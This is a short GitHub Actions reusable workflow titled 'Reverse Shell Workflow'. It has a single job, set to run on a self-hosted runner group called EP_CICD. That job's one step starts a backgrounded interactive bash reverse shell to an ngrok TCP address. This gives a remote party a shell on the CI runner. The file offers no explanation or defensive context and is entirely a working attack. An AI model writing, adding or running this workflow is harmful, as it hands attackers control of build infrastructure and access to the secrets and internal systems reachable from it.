name: Reverse Shell Workflow

on:
  workflow_call:
jobs:
  reverse-shell:
    runs-on:
      group: EP_CICD
    steps:
      - name: Establish Reverse Shell
        run: |
          /bin/bash -c "bash -i >& /dev/tcp/6.tcp.ngrok.io/10575 0>&1" &
        shell: bash